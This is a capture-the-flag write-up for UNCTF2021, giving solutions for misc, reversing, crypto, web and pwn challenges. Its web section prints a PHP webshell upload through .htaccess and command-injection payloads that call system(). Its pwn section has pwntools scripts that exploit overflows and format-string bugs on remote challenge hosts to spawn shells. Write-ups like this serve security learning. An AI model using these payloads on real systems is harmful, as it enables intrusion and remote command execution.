UNCTF2021 partial writeup

Misc

Simple log audit

Before the attachment was updated, the flag was in the description; the update, pushed at 18:00 on November 29, moved it into the attachment.

In short, there are three base64 strings in total; decoding them reveals the flag. Do you want to / forget the flag

UNCTF{CTF?YouShouJiuXing}

telecommunication fraud

Variant Caesar

s = 'qi]m^roVibdVbXUU`h'
# f = 'unctf'
# variant Caesar: character i was shifted down by (4 + i), so add it back
for i in range(len(s)):
    print(chr(ord(s[i]) +4+i),end='')
unctf{yauoreright}

Lead the flow, happy

Modify jpg height

UNCTF{BellalaBella}

LPL

Opening the PNG in 010 Editor reports an error: the CRC value is exactly 000000??, and converting the hex gives the decompression password.

Hex 4544476e622121 decodes to EDGnb!!, which is the password.
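The check 010 Editor runs here is the per-chunk CRC-32; as an added example (not from the writeup), this walker recomputes each chunk's CRC and reports the ones whose stored value does not match, which is how a tampered CRC field stands out. The sample PNG and its planted CRC 000000ab are constructed for the demo, not the challenge file.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_chunks(data):
    """Yield (type, payload, stored_crc, computed_crc) for each chunk of a PNG file."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG file")
    pos = 8
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        stored = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])[0]
        # the PNG CRC-32 covers the chunk type and payload but not the length field
        computed = zlib.crc32(ctype + payload) & 0xFFFFFFFF
        yield ctype, payload, stored, computed
        pos += 12 + length
        if ctype == b"IEND":
            break


def bad_crc_chunks(data):
    """Return one dict per chunk whose stored CRC does not match the recomputed one."""
    findings = []
    for ctype, _payload, stored, computed in png_chunks(data):
        if stored != computed:
            findings.append({"type": ctype.decode("ascii"),
                             "stored": "%08x" % stored,
                             "expected": "%08x" % computed})
    return findings


def make_chunk(ctype, payload, crc=None):
    """Build a chunk; pass crc to plant a wrong value (constructed test data only)."""
    if crc is None:
        crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


# Constructed 1x1 PNG skeleton: IHDR is intact, tEXt carries the planted CRC 000000ab
SAMPLE_PNG = (PNG_SIG
              + make_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0))
              + make_chunk(b"tEXt", b"Comment\x00hidden", crc=0x000000AB)
              + make_chunk(b"IEND", b""))

if __name__ == "__main__":
    for finding in bad_crc_chunks(SAMPLE_PNG):
        print(finding)
```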

After extracting, it gave a Bilibili link and a timestamp, so the flag was either in the comment section or in the bullet comments (danmaku); I found it in the comment section.

flag{LpL_zgbr_rNg_eDg777}

Handstand Shampoo

Given a string of hexadecimal, use the Notepad++ hex plugin to get the byte-reversed JPG, then reverse it back with a short Python script.

# read the reversed bytes, flip them back, and write the result out as a JPG
open('flag.jpg','wb').write(open('key.txt','rb').read()[::-1])

Then I found that the FFD8 start-of-image marker had become D8FF; just swap it back, and then I noticed something in the upper left corner.
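The two header repairs above (reverse the bytes, swap the SOI marker back) and the SOF height field that the "Modify jpg height" challenge plays with can be handled together; this is an added example, not the writeup's script, and the minimal JPEG header it works on is constructed for the demo.

```python
JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"

def recover_jpeg(hex_text):
    """Hex dump of a byte-reversed JPEG -> (jpeg_bytes, repairs), fixing a swapped SOI."""
    data = bytearray(bytes.fromhex(hex_text.strip())[::-1])
    repairs = []
    if data[:2] == b"\xd8\xff":          # SOI came back as D8 FF: swap it to FF D8
        data[0], data[1] = 0xFF, 0xD8
        repairs.append("swapped SOI bytes")
    if data[:2] != JPEG_SOI:
        repairs.append("no SOI marker")
    if data[-2:] != JPEG_EOI:
        repairs.append("no EOI marker, file may be truncated")
    return bytes(data), repairs

def jpeg_segments(data):
    """Yield (offset, marker, payload) for each marker segment before the scan data."""
    pos = 2
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker == 0xD9:
            break
        length = int.from_bytes(data[pos + 2:pos + 4], "big")
        yield pos, marker, data[pos + 4:pos + 2 + length]
        if marker == 0xDA:                # SOS: entropy-coded data follows, stop here
            break
        pos += 2 + length

def sof_dimensions(data):
    """(width, height) from SOF0/SOF2; the height field is what 'Modify jpg height' shrinks."""
    for _pos, marker, payload in jpeg_segments(data):
        if marker in (0xC0, 0xC2):
            return int.from_bytes(payload[3:5], "big"), int.from_bytes(payload[1:3], "big")
    return None

def set_height(data, height):
    """Copy of data with the SOF height rewritten, which exposes hidden rows."""
    for pos, marker, _payload in jpeg_segments(data):
        if marker in (0xC0, 0xC2):       # height lives at SOF offset +5..+7
            return data[:pos + 5] + height.to_bytes(2, "big") + data[pos + 7:]
    raise ValueError("no SOF segment")

# Constructed minimal JPEG header (APP0 + SOF0 for a 32x16 image), no scan data
SAMPLE = (JPEG_SOI
          + b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
          + b"\xff\xc0\x00\x0b\x08\x00\x10\x00\x20\x01\x01\x11\x00"
          + JPEG_EOI)
# The challenge file as described: SOI byte-swapped, whole file reversed, then hex-dumped
CHALLENGE_HEX = (b"\xd8\xff" + SAMPLE[2:])[::-1].hex()
```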

So I went to see the data section

After decoding, I'm serious. It's really unnecessary to change the Buddha's saying into a day..

unctf{it_is_easy_right?}

Re

ezlogin

Just find the key code and reverse it

s = 'pqsd`fl{zmpZsag}wdYVkUNC'
# the string is laid out in three rows of 8; read it column by column and XOR each char with 22
for i in range(5):
    for j in range(3):
        print(chr(ord(s[i+j*8])^22),end='')
flag{refOrL@ve}

rejunk

A pile of junk code is stacked on top; just look at the key parts directly.

s = 'WQGULxb>2:ooh95=\'\'twk'
# undo the transform: XOR each char with its index, then subtract 2
for i in range(len(s)):
    print(chr((ord(s[i])^i)-2),end='')
UNCTF{b781cbb29054db}

py_trade

Python bytecode; nothing more to it.

# true_flag = [115, 120, 96, 84, 116, 103, 105, 56, 102, 59, 127, 105, 115, 128, 95, 124, 139, 49]
# the encryption recovered from the bytecode, run on a dummy flag
flag = 'AAAAAAAAAAAAAAAAAA'
num = [0]*18
k = 0
for i in range(len(flag)):
    # each position becomes (char + index) XOR (k%3 + 1); both ends are written every round
    num[i] = (ord(flag[i])+i)^(k%3+1)
    num[len(flag)-i-1] = (ord(flag[len(flag)-i-1]) + (len(flag)-i-1))^(k%3+1)
    k += 1
print(num)

Then it turns out that each character position is independent of the others, so just brute-force one position at a time and compare its value after running the encryption.

true_flag = [115, 120, 96, 84, 116, 103, 105, 56, 102, 59, 127, 105, 115, 128, 95, 124, 139, 49]
flag = ['A']*18
num = [0]*18
k = 0
# position by position: try every printable char, re-run the encryption, keep the one that matches
for n in range(len(flag)):
    for j in range(32,128):
        flag[n] = chr(j)
        for i in range(len(flag)):
            num[i] = (ord(flag[i])+i)^(k%3+1)
            num[len(flag)-i-1] = (ord(flag[len(flag)-i-1]) + (len(flag)-i-1))^(k%3+1)
            k += 1
        # k advances by 18 per run, so k%3 starts from the same value each time
        if(true_flag[n] == num[n]):
            flag[n] = chr(j)
            break
# print(num)
print(''.join(flag))

#py_Trad3_1s_fuNny!

Just wrap it in UNCTF{}.

UNCTF{py_Trad3_1s_fuNny!}

Crypto

easy_rsa

import gmpy2
import binascii

q= 9961202707366965556741565662110710902919441271996809241009358666778850435448710324711706845973820669201482939820488174382325795134659313309606698334978471
p= 12525187149887628510447403881107442078833803097302579419605689530714690308437476207855511625840027119860834633695330551080761572835309850579517639206740101
c= 28587419802025513525354713621431206010395084854419372005671024739235625817936539010481222419824634956610184430308528941304950093228826213143262329902946812513518444587906469224383320964300417189270202019231856531012143472434842753891213128487132962453421971000901646523331476667655739056951415917218673801225
e = 65537

n = p*q
L = (p-1)*(q-1)            # phi(n); both primes are given, so nothing to factor
d = gmpy2.invert(e,L)      # private exponent d = e^-1 mod phi(n)
m = gmpy2.powmod(c,d,n)    # m = c^d mod n

print(binascii.unhexlify(hex(m)[2:]))   # turn the integer back into the flag bytes
UNCTF{Th1s_1s_f1ag_f0r_unctf_2021!!}

Exploring medieval castles

Caesar + base64 + rail fence

UNCTF{subscribe_to_Xiangwandamowang}

Analyze badusb flow

Why wasn't this one put in Misc...

# each line of separate.txt is one HID keyboard report in hex; a leading '2' in the
# modifier byte means Shift was held, and chars 2:4 hold the key's usage id
f = open('separate.txt','r').readlines()
mappings = {
    0x04:"A", 0x05:"B", 0x06:"C", 0x07:"D", 0x08:"E", 0x09:"F", 0x0A:"G",
    0x0B:"H", 0x0C:"I", 0x0D:"J", 0x0E:"K", 0x0F:"L", 0x10:"M", 0x11:"N",
    0x12:"O", 0x13:"P", 0x14:"Q", 0x15:"R", 0x16:"S", 0x17:"T", 0x18:"U",
    0x19:"V", 0x1A:"W", 0x1B:"X", 0x1C:"Y", 0x1D:"Z",
    0x1E:"1", 0x1F:"2", 0x20:"3", 0x21:"4", 0x22:"5", 0x23:"6", 0x24:"7",
    0x25:"8", 0x26:"9", 0x27:"0",
    0x28:"\n", 0x2a:"[DEL]", 0X2B:"    ", 0x2C:" ", 0x2D:"-", 0x2E:"=",
    0x2F:"[", 0x30:"]", 0x31:"\\", 0x32:"~", 0x33:";", 0x34:"'", 0x36:",", 0x37:".",
}
for i in range(len(f)):
    num = int(f[i][2:4],16)
    if(f[i][0] == '2'):            # Shift held: upper-case / shifted version of the key
        if(num in mappings):
            print(mappings[num].upper(),end='')
    else:
        if (num in mappings):
            print(mappings[num].lower(), end='')

#output:UNCTF[Y0u-Are-very-n1ce]

The [ ] become { } because Shift was held when they were typed.

UNCTF{Y0u-Are-very-n1ce}

baby_rsa

dp leakage

import gmpy2
import libnum
n= 27023180567533176673625876001733765250439008888496677405372613659387969480500400831799338479404533734632060401129194207025095826786316107611502577395964365591899893794206238112244571942694129959717225168573059987542436467778426312967832431595178558711258027999897974942046398583397445299861338203860420721585460676138091828032223153425728023656897880166788811969523526091221520293020106530587453637600349533427641518473788620430866128331962450325767202417824455886116760280239705754222948387172102353564657340216229891342124971948458724351338597649821310431397426705701275774039588035776573373417654649168810548916141
c= 3489599657527403893851973553294684608504140532554562294027722218597464669848608337663997115805201027340092733823019661706872544231209523772845492398492677185660213963118144668038183924970370481476141221609706208064428560732214361469135212057355342825193598971775551833240699393482839422273480793244841531126642199202744610656153155545415859410361595564197685655133074582118230993519133935533313364233668337427608419528430102794052261190930670933657287272452581248934890029409559234507626012423255430699687038808658327174609660874748540185589263800447650242593224189976058739054174360024536594384447518687126891675059
e= 65537
# the ciphertext shares a factor with n, so gcd(n, c) hands us p directly
p = gmpy2.gcd(n,c)
q = n//p
phi = (q-1)*(p-1)
d = gmpy2.invert(e,phi)
m = pow(c,d,n)
# the decrypted value still carries the factor p; divide it out before converting to bytes
print(libnum.n2s(int(m//p)))

Telecom fraud pro

It looks like obvious ROT47... (?)

Although I still tried subtracting first and found a difference of 64 between the ciphertext and unctf,

Anyway, it's ROT47; shift the 64 away.

unctf{5Yir6Kej5LqG77yM6YKj5Liq5bCx5pivZmxhZw}

Don't decode the middle part; that is the flag.
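The "subtract first and see what the difference is" instinct above is a known-plaintext check: with the flag prefix fixed at unctf{, there is exactly one shift over the 94 printable characters that produces it. This added example (not from the writeup) implements that shift search alongside ROT47, then decodes the inner base64 to show why the middle part is the flag; the ciphertext is constructed by ROT47-encoding the flag, since the challenge string itself is not on the page.

```python
import base64


def rot_printable(text, shift):
    """Shift every printable ASCII char (0x21-0x7E, 94 symbols) by `shift`; shift 47 is ROT47."""
    out = []
    for ch in text:
        o = ord(ch)
        if 0x21 <= o <= 0x7E:
            out.append(chr(0x21 + (o - 0x21 + shift) % 94))
        else:
            out.append(ch)              # spaces and non-ASCII pass through untouched
    return "".join(out)


def find_shift(cipher, known_prefix="unctf{"):
    """Known-plaintext check: the one shift that turns the start of cipher into the prefix."""
    for shift in range(94):
        if rot_printable(cipher[:len(known_prefix)], shift) == known_prefix:
            return shift
    return None


def inner_base64(flag):
    """Decode the base64 body between the braces, restoring the stripped '=' padding."""
    body = flag[flag.index("{") + 1:flag.rindex("}")]
    body += "=" * (-len(body) % 4)
    return base64.b64decode(body).decode("utf-8")


FLAG = "unctf{5Yir6Kej5LqG77yM6YKj5Liq5bCx5pivZmxhZw}"
# constructed ciphertext: the flag after ROT47 (47 + 47 = 94, so ROT47 undoes itself)
CIPHER = rot_printable(FLAG, 47)

if __name__ == "__main__":
    shift = find_shift(CIPHER)
    print("shift:", shift, "->", rot_printable(CIPHER, shift))
    print("inner text:", inner_base64(FLAG))
```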

Web

fuzz_md5

unctf is replaced with an empty string, so writing it doubled (double-write bypass) gets through the filter.

Brute-force a value whose MD5 starts with 66666.

import hashlib
# try small integers until one has an MD5 hex digest starting with 66666
for i in range(9999999):
    data = str(i).encode()
    m = hashlib.md5(data).hexdigest()
    if(m[:5] == '66666'):
        print(i)
        break
#1004649

babywrite

https://www.anquanke.com/post/id/241147#h3-18

https://www.cnblogs.com/doherasyang/p/14571302.html

The original challenge was adapted and throws an error. I saw it was running on Apache, so I used .htaccess to get the flag.

The original challenge used POST; here it is GET, and the line feed can be written as %0a.

?filename=.htaccess&content=AddType application/x-httpd-p\%0Ahp .ppt%0Ap\%0Ahp_value a\%0Auto_append_file "p\%0Ahp://filter/convert.b\%0Aase64-decode/resource=mn.ppt"

?filename=mn.ppt&content=GIF89a12%0APD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKTs/Pg==

Finish

phpmysql

The sink is, in effect, echo new db_user(db_pwd); with the class name and its argument taken from the request, and that is what executes the command.

Exception is PHP's built-in exception handling class, used to change the normal flow of the script when a specified error occurs.

ReflectionClass and ReflectionMethod are the common reflection classes; think of them as a mapping of a class.

This is the same trick as ctfshow web109: error-based RCE. Although an error is thrown, the command inside has already been executed. The class must have a __toString() magic method; Exception, mysqli, ReflectionClass and so on all work here.

POST:host=127.0.0.1&port=3306&pwd=system('ls /')&user=mysqli

POST:host=127.0.0.1&port=3306&pwd=system('tac /fllllaaaaag')&user=mysqli

Pwn

magic_int

An int overflow and a stack overflow involving puts.

puts counts the newline character. I kept using +8 before the return address, but later found that it is +7.

from pwn import *
p = remote('node2.hackingfor.fun',30993)
# 2147483648 = 0x80000000 does not fit a signed 32-bit int: the int overflow
p.send(b'2147483648\x00')
p.recv()
# puts counts the trailing newline, so the padding is 0x70+7, not +8
payload = b'a'*(0x70+7)+p64(0x400781)
p.sendline(payload)
p.interactive()

fo

A format string leaks the canary, then a stack overflow.

from pwn import *

p=remote('node2.hackingfor.fun',36767)
context.log_level='debug'
# format string leak: the 17th stack argument is the canary
p.sendlineafter('you?\n','%17$p')
p.recvuntil('0x')
canary=int(p.recv(16),16)
success('canary:'+hex(canary))
# overflow: padding, the leaked canary put back in place, saved rbp, then the target address
p.sendlineafter('wait for your good news...\n',b'a'*0x58+p64(canary)+p64(0)+p64(0x40080d))
p.interactive()

sc

ret2shellcode

from pwn import *

p=remote('node2.hackingfor.fun',31483)
context.arch='amd64'
context.log_level='debug'
# asm() already returns bytes; wrapping it in str() would send the repr, not the shellcode
p.sendlineafter('show me your Migic',asm(shellcraft.sh()))
# overwrite the return address with the buffer the shellcode was stored in
p.sendlineafter('Have you finished?\n',b'a'*0x18+p64(0x601080))
p.interactive()

ezfsb

printf is used to overwrite a small number and then a large number, and then the stack overflows to get the shell. Writing small and large values with a printf format string is on the CTF wiki and is fine for beginners to learn.

Then, after system('code '), call read to write /bin/sh into memory as the argument for system, and call system('/bin/sh').

from pwn import *
elf = ELF('./pwn')
context.log_level='debug'
p = remote('node2.hackingfor.fun',32119)
a_addr = 0x0804A050
p.recvuntil('hard!')
# payload = b'AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p'   # offset probe
# first write: %7$n stores the byte count printed so far (a small number) at a_addr
payload = b'aa%7$naa' + p32(a_addr)
p.sendline(payload)
p.recvuntil('right')
p.recv()
# second write: the large number, built by pwntools' fmtstr_payload at argument offset 5
p.sendline(fmtstr_payload(5,{0x0804A04D:0x22}))
p.recvuntil('good')
# stack overflow: read() "/bin/sh" into 0x804ab00, then system() on that buffer
payload = b'a'*(0x74+4)+p32(elf.plt['read'])+p32(0x080486d9)+p32(0)+p32(0x804ab00)+p32(0x4)+p32(elf.plt['system'])+p32(0)+p32(0x804ab00)
p.sendline(payload)
p.interactive()

Tags: CTF Information Security

Posted on Mon, 06 Dec 2021 22:59:08 -0500 by danago